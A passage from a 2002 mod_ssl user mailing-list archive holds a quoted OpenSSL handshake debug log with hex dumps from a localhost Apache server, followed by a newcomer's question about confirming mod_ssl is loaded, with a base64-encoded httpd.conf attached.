70 b6 ed f3 55 9b > ...@|.K..:p...U. | > | 0010: 8a 51 71 cd 43 b8 42 44-0c 96 7d 3a 67 69 34 b5 > .Qq.C.BD..}:gi4. | > | 0020: 01 b9 d4 3a 66 d6 d5 2e-b2 99 f0 8f 27 16 9e 03 > ...:f.......'... | > | 0030: fa 5e 49 60 37 d2 91 f8-d9 33 f5 3b b5 6f ec 03 > .^I`7....3.;.o.. | > | 0040: e2 6d 7a 13 > .mz. | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read > client key exchange A > [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 14 03 00 00 01 > ..... | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 1/1 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 01 > . | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 16 03 00 00 38 > ....8 | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 56/56 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 51 62 5a b2 4a 9d a5 9c-de ea ca 38 08 f3 27 e0 > QbZ.J......8..'. | > | 0010: 5e 44 5e c0 cd 95 98 91-8d e3 64 07 6b 26 06 98 > ^D^.......d.k&.. | > | 0020: e5 f6 f9 d9 56 80 62 fc-73 db d9 2c 48 dd 3e 79 > ....V.b.s..,H.>y | > | 0030: 5f 84 12 f4 e8 33 0e c3- > _....3.. | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read > finished A > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write > change cipher spec A > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write > finished A > [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: write 67/67 bytes to > BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 14 03 00 00 01 01 16 03-00 00 38 5c 40 23 59 8f > ..........8\@#Y. | > | 0010: a9 80 5f af d7 d6 cd f3-f3 8e c7 a9 71 55 06 25 > .._.........qU.% | > | 0020: aa 54 9b 88 08 71 6e 48-c8 3b 4b b5 c1 ac ec 95 > .T...qnH.;K..... | > | 0030: c4 a8 93 a2 73 d6 88 ec-71 39 ea 71 f6 fe 81 10 > ....s...q9.q.... | > | 0040: 68 04 2c > h., | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 flush data > [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Handshake: done > [20/Feb/2002 12:13:19 -423811] [info] Connection: Client IP: > 127.0.0.1, Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits) > [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 17 03 00 01 72 > ....r | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 370/370 bytes > from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: a8 d1 97 12 b3 38 e5 74-d4 81 47 ad e6 20 d2 83 .....8.t..G.. > .. | > | 0010: 68 5a af f4 79 38 c3 c4-fa 53 a1 26 95 87 31 c9 > hZ..y8...S.&..1. | > | 0020: a4 b8 5d d8 c3 d9 f0 94-f1 d4 95 0a b6 fd a6 99 > ..]............. | > | 0030: a2 2b b8 9b f4 d1 a8 6e-ad ea 57 61 b6 82 14 ae > .+.....n..Wa.... | > | 0040: 82 52 e8 b2 95 31 6c 82-48 ca 87 7b e4 a2 52 61 > .R...1l.H..{..Ra | > | 0050: 9b 0c 8c 40 41 1f a8 01-a7 b1 6c 43 ce e3 37 fa > ...@A.....lC..7. | > | 0060: 34 34 f4 3f d8 bb 82 d8-5b 35 0e 21 eb 6b 7e 7c > 44.?....[5.!.k~| | > | 0070: a6 5d 1b 2c 7f 87 61 e0-ee aa 34 c6 02 52 c1 df > .].,..a...4..R.. | > | 0080: b1 ea 01 a0 f4 9c 43 4b-86 84 5b df d5 e7 78 ca > ......CK..[...x. | > | 0090: 5a 4e b4 a8 75 29 89 0a-e2 9b 9a bd 14 97 5c e0 > ZN..u)........\. | > | 00a0: 8c 18 d8 e7 fc 3b a0 9d-1c c8 4c 64 67 92 64 92 > .....;....Ldg.d. | > | 00b0: 56 b3 32 00 56 a9 62 e3-75 ec 3c 2d 19 f6 c0 11 > V.2.V.b.u.<-.... | > | 00c0: df 7a 00 42 63 d7 15 ac-17 c3 e4 7c 0c 3b 9b ed > .z.Bc......|.;.. | > | 00d0: 75 9d 18 ec c3 ce d1 7f-30 1c c9 f6 4f 16 77 8a > u.......0...O.w. | > | 00e0: 0f e1 18 fc 89 f7 d5 31-cf f9 bf 6d c1 25 5c 08 > .......1...m.%\. | > | 00f0: 10 32 44 30 24 b6 60 d6-e3 d7 56 81 4c af 65 c1 > .2D0$.`...V.L.e. | > | 0100: 61 60 12 08 17 d0 3e 6f-ee bb a6 05 10 68 f4 bb > a`....>o.....h.. | > | 0110: c6 f2 e2 ef 48 8f ae 13-0a fb 33 67 20 b1 2a 71 ....H.....3g > .*q | > | 0120: 2d 83 80 31 6b 8e 72 58-fc 97 ed 10 ce 13 ab 22 > -..1k.rX......." | > | 0130: f1 78 d0 27 9c b7 2d cd-80 e3 bd 66 f4 6a 02 98 > .x.'..-....f.j.. | > | 0140: cf 1d c9 20 34 41 8c 28-d1 0e 8a e5 9f 70 06 7d ... > 4A.(.....p.} | > | 0150: e4 1e 59 94 76 d0 02 97-4a 84 fc 89 17 3a a2 d7 > ..Y.v...J....:.. | > | 0160: 4a 42 b1 2a ba 5c b7 cc-fa f2 ce 1d 56 60 7e 08 > JB.*.\......V`~. | > | 0170: 7a b3 > z. | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 17 03 00 00 55 > ....U | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 85/85 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 38 8a 8b 75 1c b1 c4 cc-0b 19 1c df 8d 79 f7 6f > 8..u.........y.o | > | 0010: e8 2e ad e0 8b fd 14 65-ab 42 78 1a 9a 2b 70 13 > .......e.Bx..+p. | > | 0020: df 74 a2 71 b2 37 dc d7-1c 57 f1 57 33 e7 8f 34 > .t.q.7...W.W3..4 | > | 0030: 42 cd 18 80 7a 2c 49 ef-b1 90 6c 38 0d 2f 19 bf > B...z,I...l8./.. | > | 0040: ac a2 dd b3 ff ec e1 7e-47 b1 cb 88 62 f6 68 0d > .......~G...b.h. | > | 0050: dc 6c 29 30 92 > .l)0. | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 17 03 00 00 11 > ..... | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 6c 75 f0 9d b0 7e c6 da-9f 1c bb 8d 34 bc 48 35 > lu...~......4.H5 | > | 0010: 85 > . | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 17 03 00 00 11 > ..... | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: db 8a c4 47 00 ae 72 5d-6a f9 86 f8 c4 4d b9 ee > ...G..r]j....M.. | > | 0010: 8b > . | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:28 -423811] [info] Initial (No.1) HTTPS request > received for child 0 (server localhost:443) > [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 605/605 bytes to > BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 17 03 00 02 58 a2 eb 8c-27 78 2c 7b 2f 60 30 86 > ....X...'x,{/`0. | > | 0010: 97 6e a9 7c 99 d8 2a 07-0e 74 f8 c2 d6 75 bb d5 > .n.|..*..t...u.. | > | 0020: 27 7e d2 f0 ea 2e b2 db-05 54 bf 9f 7c 50 e8 7b > '~.......T..|P.{ | > | 0030: 0e cd b1 e3 72 e0 ff cc-ef 2a 00 66 41 61 1e ec > ....r....*.fAa.. | > | 0040: f8 ed c3 be 75 03 29 62-b3 c3 a2 8b 5e 75 06 62 > ....u.)b....^u.b | > | 0050: 42 9d 17 42 ca 42 3a e7-dd d2 18 c4 5b f6 bd 53 > B..B.B:.....[..S | > | 0060: 54 85 10 68 66 0a 96 9b-30 9a d2 8d c9 09 de 43 > T..hf...0......C | > | 0070: bf 68 20 a1 91 1c 90 97-34 83 1f aa e9 6a 14 da .h > .....4....j.. | > | 0080: d1 11 5d 97 42 a8 12 14-e4 3b df 63 74 d4 a3 52 > ..].B....;.ct..R | > | 0090: 09 e8 fe a0 ef 9a fb fc-f0 26 fd cc 4e a0 3c 4c > .........&..N. | 00a0: c8 66 06 a6 ec 0a fd 52-bf a0 94 3d 9f e8 e3 10 > .f.....R...=.... | > | 00b0: 3a fa b7 27 35 78 0f f0-49 1a f5 b0 e8 db a3 59 > :..'5x..I......Y | > | 00c0: b2 ac 31 a0 b5 b1 b5 0f-b5 5e 31 e5 da a4 34 46 > ..1......^1...4F | > | 00d0: a9 74 9c b5 33 3a a3 d6-9b c3 72 2e 0e 22 39 e3 > .t..3:....r.."9. | > | 00e0: f9 65 10 f1 d2 da 53 ee-fb e8 e8 d2 b7 c9 44 90 > .e....S.......D. | > | 00f0: 5d d9 4c 80 49 e0 48 c2-b1 db 58 1d 9d bb c6 2c > ].L.I.H...X...., | > | 0100: 7d 37 79 ba 2a 4f b1 b8-01 f6 12 8a 2f ea 3d 63 > }7y.*O....../.=c | > | 0110: e6 46 fa e0 64 cf f5 19-aa db 7d 1a 46 fe a9 30 > .F..d.....}.F..0 | > | 0120: 46 29 cc 9f ad 2d 01 2f-04 d3 c3 87 52 a4 5f ce > F)...-./....R._. | > | 0130: 3d ee 55 94 f1 6f b1 d0-26 8d d8 ea 9b 9e 93 14 > =.U..o..&....... | > | 0140: 52 19 c9 42 f6 03 0c ef-f7 ee 18 9f 52 95 b6 88 > R..B........R... | > | 0150: 0c 59 f2 78 cc 18 0e f1-99 ae 5a fe 61 6d 0b 15 > .Y.x......Z.am.. | > | 0160: 5e 1d e2 f5 a0 ac 51 c0-f8 95 71 b8 9c 9b e2 4f > ^.....Q...q....O | > | 0170: b6 d5 1e 8a 0b bf cb f2-45 92 5e 99 a4 92 29 93 > ........E.^...). | > | 0180: fb f4 a8 4e ac ef 02 b3-51 bc f1 e3 63 f3 25 1c > ...N....Q...c.%. | > | 0190: 2e c2 69 d2 6f 2f 6d c1-46 a6 44 28 50 46 9e d1 > ..i.o/m.F.D(PF.. | > | 01a0: 3b e2 94 3d b1 d1 23 c3-6d 46 8a 22 45 23 9e 45 > ;..=..#.mF."E#.E | > | 01b0: ea 24 c1 a2 96 ff 51 4c-22 60 e2 a8 76 11 8b 9e > .$....QL"`..v... | > | 01c0: e9 6f 24 99 1c b6 1a 9c-b6 ed 0a a7 8e 69 f9 e7 > .o$..........i.. | > | 01d0: 37 fd e5 14 4a 3f 41 4c-06 2e 1d a9 8f a6 48 d3 > 7...J?AL......H. | > | 01e0: 9a 9a c2 10 b5 b0 55 ad-3f 99 23 3e cf 1e a4 95 > ......U.?.#>.... | > | 01f0: f1 07 95 0b cb cb bd 41-40 60 14 24 06 1a 50 43 > .......A@`.$..PC | > | 0200: ee 8f ca 00 e0 5a a1 54-e3 3b 84 6f 0b 6a 58 2c > .....Z.T.;.o.jX, | > | 0210: 6f 1d 3d 6b 2b 4c 8d c8-bb 05 82 d3 bd f7 8c 92 > o.=k+L.......... | > | 0220: a8 6a 61 56 ce 66 37 ff-c8 2f 94 ef c2 2a 3a ff > .jaV.f7../...*:. | > | 0230: 4f 82 0f 61 ed 50 d0 9e-6e cb e1 68 92 64 f3 43 > O..a.P..n..h.d.C | > | 0240: 2f a0 a1 18 08 6b ad cd-b5 27 f6 a1 13 e2 dc c0 > /....k...'...... | > | 0250: c2 cb 02 ae a6 37 d3 5d-e6 a8 f1 38 87 > .....7.]...8. | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 23/23 bytes to > BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 15 03 00 00 12 0a fc da-5b 1a 33 bc 0f cb cf df > ........[.3..... | > | 0010: 11 2a 0f 7a 1a 11 1f > .*.z... | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:30 -423811] [trace] OpenSSL: Write: SSL negotiation > finished successfully > [20/Feb/2002 12:13:30 -423811] [info] Connection to child 0 closed > with standard shutdown (server localhost:443, client 127.0.0.1) > > > I searched the news groups but I did not find anything relevat to this > problem. There is a problem with Nescape and renegotiation, but I do > not think that this is my problem. > Please let me know if there is any fix to this kind of problem. > > Thank you, > Marian > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 23:39:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA02157; Mon, 25 Feb 2002 23:09:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id XAA01718; Mon, 25 Feb 2002 23:04:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 870A24CE693; Mon, 25 Feb 2002 22:02:16 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1PK8ah38675; Mon, 25 Feb 2002 21:08:36 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ureach.com id UAA15675; Mon, 25 Feb 2002 20:18:46 +0100 (MET) Received: from www20.ureach.com (www20.ureach.com [172.16.2.48]) by ureach.com (8.9.1/8.8.5) with ESMTP id OAA24660 for ; Mon, 25 Feb 2002 14:18:44 -0500 Received: (from nobody@localhost) by www20.ureach.com (8.9.3/8.9.1) id OAA15342; Mon, 25 Feb 2002 14:18:44 -0500 Date: Mon, 25 Feb 2002 14:18:44 -0500 Message-Id: <200202251918.OAA15342@www20.ureach.com> To: modssl-users@modssl.org From: Eric Webber Subject: newbie mod_ssl questions Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="_uReach_com_1804289383101466472415339xxx_" X-vsuite-type: e Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Webber X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --_uReach_com_1804289383101466472415339xxx_ Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit I have a linux box that came with Apache preinstalled and in the httpd.conf there are entries such as LoadModule ssl_module modules/libssl.so which would seem to indicate mod ssl is loaded but when I go to https://myserver.com I get nothing. How can I tell if ssl is really loaded, and what is the best faq to read for my situation, i.e. I have apache 1.3.20 RedHat, OpenSSL version 0.9.6b, on redhat version 2.4.7-10. Is there a simple way to list all my modules that are actually loaded dynamically ? [I know the static command] I want to simply provide ssl encryption of web sessions between known and unknown clients and our webserver. I have attached a copy of my httpd.conf file. warmest regards, Eric Sean Webber ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag --_uReach_com_1804289383101466472415339xxx_ Content-Type: application/octet-stream Content-Disposition: attachment; filename="httpd.conf" Content-Transfer-Encoding: base64 IwojIEJhc2VkIHVwb24gdGhlIE5DU0Egc2VydmVy IGNvbmZpZ3VyYXRpb24gZmlsZXMgb3JpZ2luYWxseSBieSBSb2IgTWNDb29sLgojCiMgVGhpcyBp cyB0aGUgbWFpbiBBcGFjaGUgc2VydmVyIGNvbmZpZ3VyYXRpb24gZmlsZS4gIEl0IGNvbnRhaW5z IHRoZQojIGNvbmZpZ3VyYXRpb24gZGlyZWN0aXZlcyB0aGF0IGdpdmUgdGhlIHNlcnZlciBpdHMg aW5zdHJ1Y3Rpb25zLgojIFNlZSA8VVJMOmh0dHA6Ly93d3cuYXBhY2hlLm9yZy9kb2NzLz4gZm9y IGRldGFpbGVkIGluZm9ybWF0aW9uIGFib3V0CiMgdGhlIGRpcmVjdGl2ZXMuCiMKIyBEbyBOT1Qg c2ltcGx5IHJlYWQgdGhlIGluc3RydWN0aW9ucyBpbiBoZXJlIHdpdGhvdXQgdW5kZXJzdGFuZGlu ZwojIHdoYXQgdGhleSBkby4gIFRoZXkncmUgaGVyZSBvbmx5IGFzIGhpbnRzIG9yIHJlbWluZGVy cy4gIElmIHlvdSBhcmUgdW5zdXJlCiMgY29uc3VsdCB0aGUgb25saW5lIGRvY3MuIFlvdSBoYXZl IGJlZW4gd2FybmVkLiAgCiMKIyBBZnRlciB0aGlzIGZpbGUgaXMgcHJvY2Vzc2VkLCB0aGUgc2Vy dmVyIHdpbGwgbG9vayBmb3IgYW5kIHByb2Nlc3MKIyAvZXRjL2h0dHBkL2NvbmYvc3JtLmNvbmYg YW5kIHRoZW4gL2V0Yy9odHRwZC9jb25mL2FjY2Vzcy5jb25mCiMgdW5sZXNzIHlvdSBoYXZlIG92 ZXJyaWRkZW4gdGhlc2Ugd2l0aCBSZXNvdXJjZUNvbmZpZyBhbmQvb3IKIyBBY2Nlc3NDb25maWcg ZGlyZWN0aXZlcyBoZXJlLgojCiMgVGhlIGNvbmZpZ3VyYXRpb24gZGlyZWN0aXZlcyBhcmUgZ3Jv dXBlZCBpbnRvIHRocmVlIGJhc2ljIHNlY3Rpb25zOgojICAxLiBEaXJlY3RpdmVzIHRoYXQgY29u dHJvbCB0aGUgb3BlcmF0aW9uIG9mIHRoZSBBcGFjaGUgc2VydmVyIHByb2Nlc3MgYXMgYQojICAg ICB3aG9sZSAodGhlICdnbG9iYWwgZW52aXJvbm1lbnQnKS4KIyAgMi4gRGlyZWN0aXZlcyB0aGF0 IGRlZmluZSB0aGUgcGFyYW1ldGVycyBvZiB0aGUgJ21haW4nIG9yICdkZWZhdWx0JyBzZXJ2ZXIs CiMgICAgIHdoaWNoIHJlc3BvbmRzIHRvIHJlcXVlc3RzIHRoYXQgYXJlbid0IGhhbmRsZWQgYnkg YSB2aXJ0dWFsIGhvc3QuCiMgICAgIFRoZXNlIGRpcmVjdGl2ZXMgYWxzbyBwcm92aWRlIGRlZmF1 bHQgdmFsdWVzIGZvciB0aGUgc2V0dGluZ3MKIyAgICAgb2YgYWxsIHZpcnR1YWwgaG9zdHMuCiMg IDMuIFNldHRpbmdzIGZvciB2aXJ0dWFsIGhvc3RzLCB3aGljaCBhbGxvdyBXZWIgcmVxdWVzdHMg dG8gYmUgc2VudCB0bwojICAgICBkaWZmZXJlbnQgSVAgYWRkcmVzc2VzIG9yIGhvc3RuYW1lcyBh bmQgaGF2ZSB0aGVtIGhhbmRsZWQgYnkgdGhlCiMgICAgIHNhbWUgQXBhY2hlIHNlcnZlciBwcm9j ZXNzLgojCiMgQ29uZmlndXJhdGlvbiBhbmQgbG9nZmlsZSBuYW1lczogSWYgdGhlIGZpbGVuYW1l cyB5b3Ugc3BlY2lmeSBmb3IgbWFueQojIG9mIHRoZSBzZXJ2ZXIncyBjb250cm9sIGZpbGVzIGJl Z2luIHdpdGggIi8iIChvciAiZHJpdmU6LyIgZm9yIFdpbjMyKSwgdGhlCiMgc2VydmVyIHdpbGwg dXNlIHRoYXQgZXhwbGljaXQgcGF0aC4gIElmIHRoZSBmaWxlbmFtZXMgZG8gKm5vdCogYmVnaW4K IyB3aXRoICIvIiwgdGhlIHZhbHVlIG9mIFNlcnZlclJvb3QgaXMgcHJlcGVuZGVkIC0tIHNvICJs b2dzL2Zvby5sb2ciCiMgd2l0aCBTZXJ2ZXJSb290IHNldCB0byAiL3Vzci9sb2NhbC9hcGFjaGUi IHdpbGwgYmUgaW50ZXJwcmV0ZWQgYnkgdGhlCiMgc2VydmVyIGFzICIvdXNyL2xvY2FsL2FwYWNo ZS9sb2dzL2Zvby5sb2ciLgojCgojIyMgU2VjdGlvbiAxOiBHbG9iYWwgRW52aXJvbm1lbnQKIwoj IFRoZSBkaXJlY3RpdmVzIGluIHRoaXMgc2VjdGlvbiBhZmZlY3QgdGhlIG92ZXJhbGwgb3BlcmF0 aW9uIG9mIEFwYWNoZSwKIyBzdWNoIGFzIHRoZSBudW1iZXIgb2YgY29uY3VycmVudCByZXF1ZXN0 cyBpdCBjYW4gaGFuZGxlIG9yIHdoZXJlIGl0CiMgY2FuIGZpbmQgaXRzIGNvbmZpZ3VyYXRpb24g ZmlsZXMuCiMKCiMKIyBTZXJ2ZXJUeXBlIGlzIGVpdGhlciBpbmV0ZCwgb3Igc3RhbmRhbG9uZS4g IEluZXRkIG1vZGUgaXMgb25seSBzdXBwb3J0ZWQgb24KIyBVbml4IHBsYXRmb3Jtcy4KIwpTZXJ2 ZXJUeXBlIHN0YW5kYWxvbmUKCiMKIyBTZXJ2ZXJSb290OiBUaGUgdG9wIG9mIHRoZSBkaXJlY3Rv cnkgdHJlZSB1bmRlciB3aGljaCB0aGUgc2VydmVyJ3MKIyBjb25maWd1cmF0aW9uLCBlcnJvciwg YW5kIGxvZyBmaWxlcyBhcmUga2VwdC4KIwojIE5PVEUhICBJZiB5b3UgaW50ZW5kIHRvIHBsYWNl IHRoaXMgb24gYW4gTkZTIChvciBvdGhlcndpc2UgbmV0d29yaykKIyBtb3VudGVkIGZpbGVzeXN0 ZW0gdGhlbiBwbGVhc2UgcmVhZCB0aGUgTG9ja0ZpbGUgZG9jdW1lbnRhdGlvbgojIChhdmFpbGFi bGUgYXQgPFVSTDpodHRwOi8vd3d3LmFwYWNoZS5vcmcvZG9jcy9tb2QvY29yZS5odG1sI2xvY2tm aWxlPik7CiMgeW91IHdpbGwgc2F2ZSB5b3Vyc2VsZiBhIGxvdCBvZiB0cm91YmxlLgojCiMgRG8g Tk9UIGFkZCBhIHNsYXNoIGF0IHRoZSBlbmQgb2YgdGhlIGRpcmVjdG9yeSBwYXRoLgojClNlcnZl clJvb3QgIi9ldGMvaHR0cGQiCgojCiMgVGhlIExvY2tGaWxlIGRpcmVjdGl2ZSBzZXRzIHRoZSBw YXRoIHRvIHRoZSBsb2NrZmlsZSB1c2VkIHdoZW4gQXBhY2hlCiMgaXMgY29tcGlsZWQgd2l0aCBl aXRoZXIgVVNFX0ZDTlRMX1NFUklBTElaRURfQUNDRVBUIG9yCiMgVVNFX0ZMT0NLX1NFUklBTEla RURfQUNDRVBULiBUaGlzIGRpcmVjdGl2ZSBzaG91bGQgbm9ybWFsbHkgYmUgbGVmdCBhdAojIGl0 cyBkZWZhdWx0IHZhbHVlLiBUaGUgbWFpbiByZWFzb24gZm9yIGNoYW5naW5nIGl0IGlzIGlmIHRo ZSBsb2dzCiMgZGlyZWN0b3J5IGlzIE5GUyBtb3VudGVkLCBzaW5jZSB0aGUgbG9ja2ZpbGUgTVVT VCBCRSBTVE9SRUQgT04gQSBMT0NBTAojIERJU0suIFRoZSBQSUQgb2YgdGhlIG1haW4gc2VydmVy IHByb2Nlc3MgaXMgYXV0b21hdGljYWxseSBhcHBlbmRlZCB0bwojIHRoZSBmaWxlbmFtZS4gCiMK TG9ja0ZpbGUgL3Zhci9ydW4vaHR0cGQubG9jawoKIwojIFBpZEZpbGU6IFRoZSBmaWxlIGluIHdo aWNoIHRoZSBzZXJ2ZXIgc2hvdWxkIHJlY29yZCBpdHMgcHJvY2VzcwojIGlkZW50aWZpY2F0aW9u IG51bWJlciB3aGVuIGl0IHN0YXJ0cy4KIwpQaWRGaWxlIC92YXIvcnVuL2h0dHBkLnBpZAoKIwoj IFNjb3JlQm9hcmRGaWxlOiBGaWxlIHVzZWQgdG8gc3RvcmUgaW50ZXJuYWwgc2VydmVyIHByb2Nl c3MgaW5mb3JtYXRpb24uCiMgTm90IGFsbCBhcmNoaXRlY3R1cmVzIHJlcXVpcmUgdGhpcy4gIEJ1 dCBpZiB5b3VycyBkb2VzICh5b3UnbGwga25vdyBiZWNhdXNlCiMgdGhpcyBmaWxlIHdpbGwgYmUg IGNyZWF0ZWQgd2hlbiB5b3UgcnVuIEFwYWNoZSkgdGhlbiB5b3UgKm11c3QqIGVuc3VyZSB0aGF0 CiMgbm8gdHdvIGludm9jYXRpb25zIG9mIEFwYWNoZSBzaGFyZSB0aGUgc2FtZSBzY29yZWJvYXJk IGZpbGUuCiMKU2NvcmVCb2FyZEZpbGUgbG9ncy9hcGFjaGVfcnVudGltZV9zdGF0dXMKCiMKIyBJ biB0aGUgc3RhbmRhcmQgY29uZmlndXJhdGlvbiwgdGhlIHNlcnZlciB3aWxsIHByb2Nlc3MgaHR0 cGQuY29uZiAodGhpcyAKIyBmaWxlLCBzcGVjaWZpZWQgYnkgdGhlIC1mIGNvbW1hbmQgbGluZSBv cHRpb24pLCBzcm0uY29uZiwgYW5kIGFjY2Vzcy5jb25mIAojIGluIHRoYXQgb3JkZXIuICBUaGUg bGF0dGVyIHR3byBmaWxlcyBhcmUgbm93IGRpc3RyaWJ1dGVkIGVtcHR5LCBhcyBpdCBpcyAKIyBy ZWNvbW1lbmRlZCB0aGF0IGFsbCBkaXJlY3RpdmVzIGJlIGtlcHQgaW4gYSBzaW5nbGUgZmlsZSBm b3Igc2ltcGxpY2l0eS4gIAojIFRoZSBjb21tZW50ZWQtb3V0IHZhbHVlcyBiZWxvdyBhcmUgdGhl IGJ1aWx0LWluIGRlZmF1bHRzLiAgWW91IGNhbiBoYXZlIHRoZSAKIyBzZXJ2ZXIgaWdub3JlIHRo ZXNlIGZpbGVzIGFsdG9nZXRoZXIgYnkgdXNpbmcgIi9kZXYvbnVsbCIgKGZvciBVbml4KSBvcgoj ICJudWwiIChmb3IgV2luMzIpIGZvciB0aGUgYXJndW1lbnRzIHRvIHRoZSBkaXJlY3RpdmVzLgoj CiNSZXNvdXJjZUNvbmZpZyBjb25mL3NybS5jb25mCiNBY2Nlc3NDb25maWcgY29uZi9hY2Nlc3Mu Y29uZgoKIwojIFRpbWVvdXQ6IFRoZSBudW1iZXIgb2Ygc2Vjb25kcyBiZWZvcmUgcmVjZWl2ZXMg YW5kIHNlbmRzIHRpbWUgb3V0LgojClRpbWVvdXQgMzAwCgojCiMgS2VlcEFsaXZlOiBXaGV0aGVy IG9yIG5vdCB0byBhbGxvdyBwZXJzaXN0ZW50IGNvbm5lY3Rpb25zIChtb3JlIHRoYW4KIyBvbmUg cmVxdWVzdCBwZXIgY29ubmVjdGlvbikuIFNldCB0byAiT2ZmIiB0byBkZWFjdGl2YXRlLgojCktl ZXBBbGl2ZSBPZmYKCiMKIyBNYXhLZWVwQWxpdmVSZXF1ZXN0czogVGhlIG1heGltdW0gbnVtYmVy IG9mIHJlcXVlc3RzIHRvIGFsbG93CiMgZHVyaW5nIGEgcGVyc2lzdGVudCBjb25uZWN0aW9uLiBT ZXQgdG8gMCB0byBhbGxvdyBhbiB1bmxpbWl0ZWQgYW1vdW50LgojIFdlIHJlY29tbWVuZCB5b3Ug bGVhdmUgdGhpcyBudW1iZXIgaGlnaCwgZm9yIG1heGltdW0gcGVyZm9ybWFuY2UuCiMKTWF4S2Vl cEFsaXZlUmVxdWVzdHMgMTAwCgojCiMgS2VlcEFsaXZlVGltZW91dDogTnVtYmVyIG9mIHNlY29u ZHMgdG8gd2FpdCBmb3IgdGhlIG5leHQgcmVxdWVzdCBmcm9tIHRoZQojIHNhbWUgY2xpZW50IG9u IHRoZSBzYW1lIGNvbm5lY3Rpb24uCiMKS2VlcEFsaXZlVGltZW91dCAxNQoKIwojIFNlcnZlci1w b29sIHNpemUgcmVndWxhdGlvbi4gIFJhdGhlciB0aGFuIG1ha2luZyB5b3UgZ3Vlc3MgaG93IG1h bnkKIyBzZXJ2ZXIgcHJvY2Vzc2VzIHlvdSBuZWVkLCBBcGFjaGUgZHluYW1pY2FsbHkgYWRhcHRz IHRvIHRoZSBsb2FkIGl0CiMgc2VlcyAtLS0gdGhhdCBpcywgaXQgdHJpZXMgdG8gbWFpbnRhaW4g 